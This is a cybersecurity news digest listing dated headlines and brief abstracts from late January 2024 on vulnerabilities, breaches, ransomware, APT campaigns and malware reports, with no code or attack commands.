January, 2024

January 31, 2024 – APT

Pawn Storm Uses Brute Force and Stealth Against High-Value Targets Full Text

Abstract

Pawn Storm, aka APT28 and Forest Blizzard, has been employing anonymization layers, such as VPN services and compromised EdgeOS routers, to hide its tracks and carry out sophisticated attacks.

Cyware

January 31, 2024 – Phishing

New Evasive Large-Scale Scareware and PUP Delivery Campaign Spotted Full Text

Abstract

Unit 42 researchers discovered a large-scale campaign dubbed ApateWeb, which uses over 130,000 domains to distribute scareware, potentially unwanted programs (PUPs), and other scam pages.

Cyware

January 31, 2024 – Vulnerabilities

RunC Flaws Enable Container Escapes, Granting Attackers Host Access Full Text

Abstract

Multiple security vulnerabilities have been disclosed in the runC command line tool that could be exploited by threat actors to escape the bounds of the container and stage follow-on attacks. The vulnerabilities, tracked as CVE-2024-21626, CVE-2024-23651, CVE-2024-23652, and CVE-2024-23653, have been collectively dubbed Leaky Vessels by cybersecurity vendor Snyk. "These container escapes could allow an attacker to gain unauthorized access to the underlying host operating system from within the container and potentially permit access to sensitive data (credentials, customer info, etc.), and launch further attacks, especially when the access gained includes superuser privileges," the company said in a report shared with The Hacker News. runC is a tool for spawning and running containers on Linux. It was originally developed as part of Docker and later spun out into a separate open-source library in 2015. A brief description of each of the flaws is below - CVE-202

The Hacker News

January 31, 2024 – Breach

Data Leak at Fintech Giant Direct Trading Technologies Full Text

Abstract

The leaked information included names, email addresses, trading activity, passwords, and other personal details. Additionally, the company's outreach team's internal comments were exposed.

Cyware

January 31, 2024 – Vulnerabilities

Alert: Ivanti Discloses 2 New Zero-Day Flaws, One Under Active Exploitation Full Text

Abstract

Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator CVE-2024-21893 (CVSS score: 8.2) - A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication The Utah-based software company said it found no evidence of customers being impacted by CVE-2024-21888 so far, but acknowledged "the exploitation of CVE-2024-21893 appears to be targeted" and that it's "aware of a limited number of cust

The Hacker News

January 31, 2024 – Vulnerabilities

Vulnerabilities in Lamassu Bitcoin ATMs Full Text

Abstract

The attack, IOActive explains, was possible due to a vulnerability in the ATM’s software update mechanism that could allow an attacker to supply their own malicious file and trigger legitimate processes for code execution.

Cyware

January 31, 2024 – Phishing

Telegram Marketplaces Fuel Phishing Attacks with Easy-to-Use Kits and Malware Full Text

Abstract

Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230. "This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and well-oiled supply chain of tools and victims' data," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a new report. "Free samples, tutorials, kits, even hackers-for-hire – everything needed to construct a complete end-to-end malicious campaign." The company also described Telegram as a "scammers paradise" and a "breeding ground for modern phishing operations." This is not the first time the popular messaging platform has come under the radar for facilitating malicious activities, which are in part driven by its lenient modera

The Hacker News

January 31, 2024 – General

Great Security or Great UX? Both, Please Full Text

Abstract

Security step-ups should only be used for higher-risk scenarios and should be implemented in a user-friendly manner to maintain a balance between security and user experience.

Cyware

January 31, 2024 – Policy and Law

The SEC Won’t Let CISOs Be: Understanding New SaaS Cybersecurity Rules Full Text

Abstract

The SEC isn't giving SaaS a free pass. Applicable public companies, known as "registrants," are now subject to cyber incident disclosure and cybersecurity readiness requirements for data stored in SaaS systems, along with the 3rd and 4th party apps connected to them. The new cybersecurity mandates make no distinction between data exposed in a breach that was stored on-premise, in the cloud, or in SaaS environments. In the SEC's own words: "We do not believe that a reasonable investor would view a significant data breach as immaterial merely because the data are housed on a cloud service." This evolving approach comes as SaaS security shortcomings continually make headlines and tech leaders debate how the SEC may change cybersecurity after charging both SolarWinds and its CISO with fraud. Why SaaS and SaaS-to-SaaS Connection Risks Matter to the SEC — And To Your Organization The perception and reality of SaaS security are, in many cases, miles apart. SaaS security leader App

The Hacker News

January 31, 2024 – Outage

Fulton County Cyberattack Brings Down Phones, Court Site and Tax Systems Full Text

Abstract

An ongoing cyberattack against Georgia’s Fulton County, which includes parts of Atlanta, has brought some of the government’s systems to a standstill, halting access to court filings, tax processing, and other services.

Cyware

January 30, 2024 – Criminals

Threat Actors Selling 1.8TB Database of 750 Million Indian Mobile Users Full Text

Abstract

The compromised database is being sold on hacker forums, with two cybercrime groups offering the data for sale, highlighting the growing threat posed by emerging threat groups like CYBO CREW and its affiliates.

Cyware

January 30, 2024 – Criminals

Brazilian Feds Dismantle Grandoreiro Banking Trojan, Arresting Top Operatives Full Text

Abstract

A Brazilian law enforcement operation has led to the arrest of several Brazilian operators in charge of the Grandoreiro malware. The Federal Police of Brazil said it served five temporary arrest warrants and 13 search and seizure warrants in the states of São Paulo, Santa Catarina, Pará, Goiás, and Mato Grosso. Slovak cybersecurity firm ESET, which provided additional assistance in the effort, said it uncovered a design flaw in Grandoreiro's network protocol that helped it to identify the victimology patterns. Grandoreiro is one of the many Latin American banking trojans such as Javali, Melcoz, Casabeniero, Mekotio, and Vadokrist, primarily targeting countries like Spain, Mexico, Brazil, and Argentina. It's known to be active since 2017. In late October 2023, Proofpoint revealed details of a phishing campaign that distributed an updated version of the malware to targets in Mexico and Spain. The banking trojan has capabilities to both steal data through keyloggers

The Hacker News

January 30, 2024 – Breach

Hundreds of Network Operators’ Credentials Found Circulating in Dark Web Full Text

Abstract

A significant number of network administrators and IT personnel were found to have their credentials compromised, highlighting the vulnerability of staff involved in network engineering and IT management operations.

Cyware

January 30, 2024 – Vulnerabilities

URGENT: Upgrade GitLab - Critical Workspace Creation Flaw Allows File Overwrite Full Text

Abstract

GitLab once again released fixes to address a critical security flaw in its Community Edition (CE) and Enterprise Edition (EE) that could be exploited to write arbitrary files while creating a workspace . Tracked as CVE-2024-0402 , the vulnerability has a CVSS score of 9.9 out of a maximum of 10. "An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.5.8, 16.6 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace," GitLab said in an advisory released on January 25, 2024. The company also noted patches for the bug have been backported to 16.5.8, 16.6.6, 16.7.4, and 16.8.1. Also resolved by GitLab are four medium-severity flaws that could lead to a regular expression denial-of-service (ReDoS), HTML injection, and the disclosure of a user's public email address via the tags RSS feed. The latest updat

The Hacker News

January 30, 2024 – Business

Dynatrace Acquires Runecast to Improve Cloud-Native Security Full Text

Abstract

Dynatrace's acquisition of Runecast will enhance its platform with AI-powered security posture management for proactive risk mitigation and real-time vulnerability assessments in hybrid and multicloud environments.

Cyware

January 30, 2024 – Attack

Ukraine’s Prisoners of War Agency Hit by Cyberattack Full Text

Abstract

Ukraine's Coordination Headquarters for Prisoners of War faced a DDoS attack, suspected to be linked to the recent crash of a Russian transport plane carrying Ukrainian prisoners and Russian servicemen.

Cyware

January 30, 2024 – Attack

China-Linked Hackers Target Myanmar’s Top Ministries with Backdoor Blitz Full Text

Abstract

The China-based threat actor known as Mustang Panda is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans. The findings come from CSIRT-CTI, which said the activities took place in November 2023 and January 2024 after artifacts in connection with the attacks were uploaded to the VirusTotal platform. "The most prominent of these TTPs are the use of legitimate software including a binary developed by engineering firm Bernecker & Rainer (B&R) and a component of the Windows 10 upgrade assistant to sideload malicious dynamic-link libraries (DLLs)," CSIRT-CTI said . Mustang Panda, active since at least 2012, is also recognized by the cybersecurity community under the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, Red Lich, Stately Taurus, and TEMP.Hex. In recent months, the adversary has been attributed to attacks targeting

The Hacker News

January 30, 2024 – Breach

US Aid Office in Colombia Reports Its Facebook Page was Hacked Full Text

Abstract

The unauthorized access to the USAID Colombia Facebook page posed a potential risk, prompting the agency to actively work on restoring account security and investigating the extent of the breach.

Cyware

January 30, 2024 – General

Top Security Posture Vulnerabilities Revealed Full Text

Abstract

Each New Year introduces a new set of challenges and opportunities for strengthening our cybersecurity posture. It's the nature of the field – the speed at which malicious actors carry out advanced persistent threats brings a constant, evolving battle for cyber resilience. The excitement in cybersecurity lies in this continuous adaptation and learning, always staying one step ahead of potential threats. As practitioners in an industry that operates around-the-clock, this hypervigilance becomes second nature. We are always in a constant state of readiness, anticipating the next move, adapting strategies, and counteracting threats. However, it remains just as crucial to have our fingers on the pulse of the most common vulnerabilities impacting security postures right now . Why? Knowing these weak points is not just about defense; it's about ensuring robust, uninterrupted business continuity in an environment where risks are always around the corner. The Importance of Regularl

The Hacker News

January 30, 2024 – Breach

Mistakenly Published Authentication Token Exposed Mercedes-Benz Source Code Full Text

Abstract

The exposure was discovered by RedHunt Labs, which found an employee's authentication token in a public GitHub repository. It could be used to access other private repositories containing cloud access keys, design documents, and source code.

Cyware

January 30, 2024 – Privacy

Italian Data Protection Watchdog Accuses ChatGPT of Privacy Violations Full Text

Abstract

Italy's data protection authority (DPA) has notified ChatGPT-maker OpenAI of supposedly violating privacy laws in the region. "The available evidence pointed to the existence of breaches of the provisions contained in the E.U. GDPR [General Data Protection Regulation]," the Garante per la protezione dei dati personali (aka the Garante) said in a statement on Monday. It also said it will "take account of the work in progress within the ad-hoc task force set up by the European Data Protection Framework (EDPB) in its final determination on the case." The development comes nearly 10 months after the watchdog imposed a temporary ban on ChatGPT in the country, weeks after which OpenAI announced a number of privacy controls, including an opt-out form to remove one's personal data from being processed by the large language model (LLM). Access to the tool was subsequently reinstated in late April 2023. The Italian DPA said the latest findings, which h

The Hacker News

January 30, 2024 – Breach

Insurance Broker Notifying 1.5 Million of Health Information Hack Full Text

Abstract

Keenan & Associates, a California insurance broker, is notifying over 1.5 million individuals about a hacking incident in August 2023. The attack compromised personal and health information, including passport numbers and Social Security numbers.

Cyware

January 30, 2024 – Malware

New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility Full Text

Abstract

Threat hunters have identified a new campaign that delivers the ZLoader malware, resurfacing nearly two years after the botnet's infrastructure was dismantled in April 2022. A new variant of the malware is said to have been in development since September 2023, Zscaler ThreatLabz said in an analysis published this month. "The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time," researchers Santiago Vicente and Ismael Garcia Perez said . ZLoader, also known by the names Terdot, DELoader, or Silent Night, is an offshoot of the Zeus banking trojan that first surfaced in 2015, before pivoting to functioning as a loader for next-stage payloads, including ransomware. Typically distributed via phishing emails and malicious search engine ads, ZLoader suffered a huge blow after a group of companies led by Micros

The Hacker News

January 30, 2024 – Outage

Cactus Ransomware Gang Claims the Schneider Electric Hack Full Text

Abstract

Schneider Electric suffered a data breach from a Cactus ransomware attack, impacting their Sustainability Business division and causing outages on the Resource Advisor cloud platform.

Cyware

January 30, 2024 – Phishing

Exploring Telegram’s Dark Markets, Breeding Ground for Modern Phishing Operations Full Text

Abstract

The phishing ecosystem has shifted from exclusive Dark web forums to public Telegram channels, making illicit tools and stolen data easily accessible to both seasoned cybercriminals and newcomers.

Cyware

January 29, 2024 – Education

493 Companies Share Their SaaS Security Battles – Get Insights in this Webinar Full Text

Abstract

In today's digital world, security risks are more prevalent than ever, especially when it comes to Software as a Service (SaaS) applications. Did you know that an alarming 97% of companies face serious risks from unsecured SaaS applications? Moreover, about 20% of these organizations are struggling with internal data threats. These statistics aren't just numbers; they're a wake-up call. We're excited to invite you to a not-to-be-missed webinar, " Critical SaaS Security Do's and Don'ts: Insights from 493 Companies ," with Ran Senderovitz , the Chief Operating Officer of Wing Security. Ran isn't just going to talk about the problems; he's going to dive deep into the realities of SaaS security, backed by extensive research and data analysis from almost 500 companies using SaaS. Here's What This Webinar Offers: Insights Across Data, SaaS Applications, Users, and AI: Explore a comprehensive analysis of the statistics about SaaS security, di

The Hacker News

January 29, 2024 – Business

Bastille Raises $44M Series C Investment Led by Goldman Sachs Asset Management Full Text

Abstract

Bastille Networks, Inc. has secured a $44 million Series C investment led by Growth Equity at Goldman Sachs Asset Management, with participation from existing investor Bessemer Venture Partners.

Cyware

January 29, 2024 – Vulnerabilities

Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords Full Text

Abstract

A now-patched security flaw in Microsoft Outlook could be exploited by threat actors to access NT LAN Manager (NTLM) v2 hashed passwords when opening a specially crafted file. The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was addressed by the tech giant as part of its Patch Tuesday updates for December 2023. "In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file," Microsoft said in an advisory released last month. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability." Put differently, the adversary would have to convince users to click a link, either embedded in a phishing email or sent via an instant message, and then deceive them into opening the file in question. CVE-2023-3563

The Hacker News

January 29, 2024 – Outage

Data Theft Plaguing K-12 Schools After Holiday Season Attacks Full Text

Abstract

Ransomware attacks have affected schools like Ohio’s Groveport Madison Schools, causing disruptions to internet access and damage to devices, but efforts to restore systems and minimize data theft have been successful.

Cyware

January 29, 2024 – Education

493 Companies Share Their SaaS Security Battles – Get Insights in this Webinar Full Text

Abstract

The Hacker News

January 29, 2024 – Policy and Law

A TrickBot malware developer sentenced to 64 months in prison Full Text

Abstract

Vladimir Dunaev was extradited to the US in October 2021 and pleaded guilty to charges related to computer fraud and identity theft. He developed malicious tools that aided in data theft and fraud, resulting in millions of dollars in losses.

Cyware

January 29, 2024 – General

Riding the AI Waves: The Rise of Artificial Intelligence to Combat Cyber Threats Full Text

Abstract

In nearly every segment of our lives, AI (artificial intelligence) now makes a significant impact: It can deliver better healthcare diagnoses and treatments; detect and reduce the risk of financial fraud; improve inventory management; and serve up the right recommendation for a streaming movie on Friday night. However, one can also make a strong case that some of AI's most significant impacts are in cybersecurity. AI's ability to learn, adapt, and predict rapidly evolving threats has made it an indispensable tool in protecting the world's businesses and governments. From basic applications like spam filtering to advanced predictive analytics and AI-assisted response, AI serves a critical role on the front lines, defending our digital assets from cyber criminals. The future for AI in cybersecurity is not all rainbows and roses, however. Today we can see the early signs of a significant shift, driven by the democratization of AI technology. While AI continues to empower organizations

The Hacker News

January 29, 2024 – Government

Saudi Arabia Boosts Railway Cybersecurity Full Text

Abstract

The railway network, spanning 4,500 kilometers in Saudi Arabia, faces challenges in securing its legacy and modern technologies, especially with the introduction of IoT signaling and communication systems.

Cyware

January 29, 2024 – Ransomware

Albabat, Kasseika, Kuiper: New Ransomware Gangs Rise with Rust and Golang Full Text

Abstract

Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as Faust . Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script. "The attackers utilized the Gitea service to store several files encoded in Base64, each carrying a malicious binary," security researcher Cara Lin said in a technical report published last week. "When these files are injected into a system's memory, they initiate a file encryption attack." Faust is the latest addition to several ransomware variants from the Phobos family, including Eking, Eight, Elbie, Devos, and 8Base. It's worth noting that Faust was previously documented by Cisco Talos in November 2023. The cybersecurity firm described the variant as active since 2022 and "does not target specific industries or re

The Hacker News

January 29, 2024 – Breach

Update: In Major Lapse, Hacked Microsoft Test Account was Assigned Admin Privileges Full Text

Abstract

The hackers who recently broke into Microsoft’s network and monitored top executives’ email for two months did so by gaining access to an aging test account with administrative privileges, a major lapse on the company's part, a researcher said.

Cyware

January 29, 2024 – Privacy

NSA Admits Secretly Buying Your Internet Browsing Data without Warrants Full Text

Abstract

The U.S. National Security Agency (NSA) has admitted to buying internet browsing records from data brokers to identify the websites and apps Americans use that would otherwise require a court order, U.S. Senator Ron Wyden said last week. "The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans' privacy are not just unethical, but illegal," Wyden said in a letter to the Director of National Intelligence (DNI), Avril Haines, in addition to urging the government to take steps to "ensure that U.S. intelligence agencies only purchase data on Americans that has been obtained in a lawful manner." Metadata about users' browsing habits can pose a serious privacy risk, as the information could be used to glean personal details about an individual based on the websites they frequent. This could include websites that offer resources related to mental health, assistance for survivors of sexual assault or do

The Hacker News

January 29, 2024 – Criminals

Who is Alleged Medibank Hacker Aleksandr Ermakov? Full Text

Abstract

Aleksandr Ermakov, a Russian cybercriminal, has been sanctioned by Australia, the UK, and the US for his alleged involvement in the Medibank data breach and his ties to the REvil ransomware group.

Cyware

January 29, 2024 – Malware

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines Full Text

Abstract

Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems. The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS." "These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week. "Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed." While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog

The Hacker News

January 29, 2024 – General

Using Google Search to Find Software can be Risky Full Text

Abstract

Despite Google's efforts to enforce abuse policies and remove malicious ads, cybercrooks are finding new ways to evade detection and continue to lead users to malware-infected websites.

Cyware

January 27, 2024 – Vulnerabilities

Update: Nearly 800 GoAnywhere Instances are Unpatched, Exposed to Critical CVE Full Text

Abstract

The majority of GoAnywhere MFT admin interfaces running on default port settings are hosted in the U.S., with more than 3 in 5 publicly exposed instances hosted on cloud networks operated by Amazon, Microsoft, and Google.

Cyware

January 27, 2024 – Breach

Therapy Provider Notifying 4 Million Patients of PJ&A Hack Full Text

Abstract

The breach has impacted at least 14 million patients across various organizations. The hack prompted a warning from New York's attorney general about potential identity theft and fraud risks.

Cyware

January 27, 2024 – Malware

AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks Full Text

Abstract

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT . The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process," the Canadian company said in an analysis published earlier this week. "The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud." The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, pub

The Hacker News

January 27, 2024 – Privacy

Pegasus Spyware Targets Togolese Journalists’ Mobile Devices Full Text

Abstract

The spyware intrusions occurred on the phones of multiple journalists, including the publisher of an independent weekly paper, raising concerns about press freedom and privacy violations in the country.

Cyware

January 27, 2024 – Criminals

Update: Akira Ransomware Gang Says It Stole Passport Scans From Lush Full Text

Abstract

The Akira ransomware gang has claimed responsibility for a cybersecurity incident at a British bath bomb merchant. They have stolen 110 GB of data, including personal documents such as passport scans, from the global cosmetics giant.

Cyware

January 27, 2024 – Attack

Mexican Banks and Cryptocurrency Platforms Targeted With AllaKore RAT Full Text

Abstract

A financially motivated threat actor based in Latin America is targeting large Mexican companies with custom packaged installers delivering a modified version of AllaKore RAT for financial fraud.

Cyware

January 26, 2024 – Solution

Perfecting the Defense-in-Depth Strategy with Automation Full Text

Abstract

Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security controls. However, the evolving cyber threat landscape can challenge even the most fortified defenses. Despite the widespread adoption of the Defense-in-Depth strategy, cyber threats persist. Fortunately, the Defense-in-Depth strategy can be augmented using Breach and Attack Simulation (BAS), an automated tool that assesses and improves every security control in each layer. Defense-in-Depth: False Sense of Security with Layers Also known as multi-layered defense, the defense-in-depth strategy has been widely adopted by organizations since the early 2000s. It's based on the assumption that a

The Hacker News

January 26, 2024 – Phishing

Malicious Ads on Google Target Chinese Users with Fake Messaging Apps Full Text

Abstract

Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign. "The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojan (RATs) instead," Malwarebytes' Jérôme Segura said in a Thursday report. "Such programs give an attacker full control of a victim's machine and the ability to drop additional malware." It's worth noting that the activity, codenamed FakeAPP , is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023. The latest iteration of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to bogus websites hosted on Google Docs or Google Sites. The Google infrastructure is used to embed link

The Hacker News

January 26, 2024 – APT

Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs Full Text

Abstract

Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew tracked as APT29 , which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. "This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs) and IT service providers, primarily in the U.S. and Europe," the Microsoft Threat Intelligence team said in a new advisory. The primary goal of these espionage missions is to gather sensitive information that is of strategic interest to Russia by maintaining footholds for extended periods of time without attracting any attention. The latest disc

The Hacker News

January 26, 2024 – Phishing

Abu Dhabi Investment Firm Warns About Scam Efforts Full Text

Abstract

The National Investor in Abu Dhabi has issued a warning about fraudulent investment schemes misusing its name, logo, and employees' identities to solicit personal and financial information.

Cyware

January 26, 2024 – Policy and Law

Russian TrickBot Mastermind Gets 5-Year Prison Sentence for Cybercrime Spree Full Text

Abstract

40-year-old Russian national Vladimir Dunaev has been sentenced to five years and four months in prison for his role in creating and distributing the TrickBot malware, the U.S. Department of Justice (DoJ) said. The development comes nearly two months after Dunaev pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud. "Hospitals, schools, and businesses were among the millions of TrickBot victims who suffered tens of millions of dollars in losses," DoJ said . "While active, TrickBot malware, which acted as an initial intrusion vector into victim computer systems, was used to support various ransomware variants." Originating as a banking trojan in 2016, TrickBot evolved into a Swiss Army knife capable of delivering additional payloads, including ransomware. Following efforts to take down the botnet, it was absorbed into the Conti ransomware operation in 2022. The cybercrime crew's allegiance to

The Hacker News

January 26, 2024 – Government

Feds Warn Healthcare Sector of ConnectWise ScreenConnect Threats Full Text

Abstract

Federal authorities warn that a self-hosted version of ConnectWise's ScreenConnect remote access tool was compromised at a large pharmacy services firm, posing a significant risk to other healthcare organizations.

Cyware

January 26, 2024 – Vulnerabilities

Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems Full Text

Abstract

Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device. Tracked as CVE-2024-20253 (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a specially crafted message to a listening port of a susceptible appliance. "A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user," Cisco said in an advisory. "With access to the underlying operating system, the attacker could also establish root access on the affected device." Synacktiv security researcher Julien Egloff has been credited with discovering and reporting CVE-2024-20253. The following products are impacted by the flaw - Unified Communications Manager (versions 11

The Hacker News

January 25, 2024 – General

Cybercrime Researcher Examines the Ransomware Victim’s Mindset Full Text

Abstract

The study by a cybercrime researcher at the University of Twente analyzed ransomware attacks in the Netherlands from 2019-2022, finding that companies working with incident response firms were most likely to pay ransoms.

Cyware

January 25, 2024 – Malware

SystemBC Malware’s C2 Server Analysis Exposes Payload Delivery Tricks Full Text

Abstract

Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC . "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk and financial advisory solutions provider said it has witnessed an increase in the use of malware throughout Q2 and Q3 2023. SystemBC, first observed in the wild in 2018, allows threat actors to remote control a compromised host and deliver additional payloads, including trojans, Cobalt Strike, and ransomware. It also features support for launching ancillary modules on the fly to expand on its core functionality. A standout aspect of the malware revolves around its use of SOCKS5 proxies to mask network traffic to and from C2 infrastructure, acting as a persistent access mechanism for post-exploitat

The Hacker News

January 25, 2024 – Outage

Major IT Outage Denies Happy Campers Their Caravan Holidays Full Text

Abstract

Members have expressed concern over potential data compromise and lack of communication from CAMC about the nature of the problem, leading to speculation about a ransomware-related security breach.

Cyware

January 25, 2024 – Vulnerabilities

Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP! Full Text

Abstract

The maintainers of the open-source continuous integration/continuous delivery and deployment (CI/CD) automation software Jenkins have resolved nine security flaws, including a critical bug that, if successfully exploited, could result in remote code execution (RCE). The issue, assigned the CVE identifier CVE-2024-23897 , has been described as an arbitrary file read vulnerability through the built-in command line interface ( CLI ) "Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands," the maintainers said in a Wednesday advisory. "This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it." A threat actor could exploit this quirk to read arbitrary files on the Jenkins controller file system

The Hacker News

January 25, 2024 – Solution

Apple Debuts New Feature to Frustrate iPhone Thieves Full Text

Abstract

A new iOS 17 update brings Stolen Device Protection feature to prevent unauthorized access and actions on stolen iPhones. Thieves will have limited access to sensitive information and actions, requiring additional authentication for critical changes.

Cyware

January 25, 2024 – Malware

LODEINFO Fileless Malware Evolves with Anti-Analysis and Remote Code Tricks Full Text

Abstract

Cybersecurity researchers have uncovered an updated version of a backdoor called LODEINFO that's distributed via spear-phishing attacks. The findings come from Japanese company ITOCHU Cyber & Intelligence, which said the malware "has been updated with new features, as well as changes to the anti-analysis (analysis avoidance) techniques." LODEINFO (versions 0.6.6 and 0.6.7) was first documented by Kaspersky in November 2022, detailing its capabilities to execute arbitrary shellcode, take screenshots, and exfiltrate files back to an actor-controlled server. A month later, ESET disclosed attacks targeting Japanese political establishments that led to the deployment of LODEINFO. The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021. Attack chains commence with phishing emails bearing

The Hacker News

January 25, 2024 – General

Report: AI, Fake CFOs Drive Soaring Corporate Payment-Fraud Attacks Full Text

Abstract

According to Trustpair, 96% of U.S. companies experienced at least one payment fraud attempt in the past year, with a 71% increase from the prior year, indicating a significant rise in fraudulent activities.

Cyware

January 25, 2024 – General

Cyber Threat Landscape: 7 Key Findings and Upcoming Trends for 2024 Full Text

Abstract

The 2023/2024 Axur Threat Landscape Report provides a comprehensive analysis of the latest cyber threats. The information combines data from the platform's surveillance of the Surface, Deep, and Dark Web with insights derived from the in-depth research and investigations conducted by the Threat Intelligence team. Discover the full scope of digital threats in the Axur Report 2023/2024. Overview In 2023, the cybersecurity landscape witnessed a remarkable rise in cyberattacks. One notable shift was the cyber risk integration with business risk, a concept gaining traction in boardrooms worldwide. As the magnitude of losses due to cyberattacks became evident, organizations started reevaluating their strategies. Geopolitical factors played a significant role in shaping information security. The conflicts between nations like Russia and Ukraine had ripple effects, influencing the tactics of cybercriminals. It was a year where external factors intertwined with digital threats. Ran

The Hacker News

January 25, 2024 – Government

HHS Details New Cyber Performance Goals for Health Sector Full Text

Abstract

The performance goals consist of essential and enhanced practices based on industry cybersecurity frameworks and aim to address common vulnerabilities and mature cybersecurity capabilities in the healthcare sector.

Cyware

January 25, 2024 – Breach

Netherlands-based Medical Lab Database Exposed 1.3 Million Records, COVID Test Information Full Text

Abstract

A Netherlands-based medical laboratory's unsecured database exposed 1.3 million records, including COVID test results and personal identifiable information, due to a configuration issue and lack of response to responsible disclosure notices.

Cyware

January 25, 2024 – General

Report: Software Supply Chain Attacks Are Getting Easier Full Text

Abstract

In 2023, ReversingLabs identified a significant increase in malicious packages across open-source software platforms like npm, PyPI, and RubyGems. The number of malicious packages detected increased by 1,300% from 2020 and 28% from 2022.

Cyware

January 25, 2024 – Policy and Law

Federal Judge Rejects NSO’s Effort to Dismiss Apple’s Pegasus Lawsuit Full Text

Abstract

Apple's lawsuit alleges that NSO Group facilitated hacking into Apple's servers, leading to significant time and expense for Apple in detecting and eradicating Pegasus from users' devices.

Cyware

January 25, 2024 – Education

Organizations need to switch gears in their approach to email security Full Text

Abstract

According to Egress, email security incidents continue to have severe impacts on organizations, with 94% experiencing security incidents in the past year, including data loss, exfiltration, and phishing attacks.

Cyware

January 25, 2024 – Attack

China-backed Hackers Hijack Software Updates to Implant “NSPX30” Spyware Full Text

Abstract

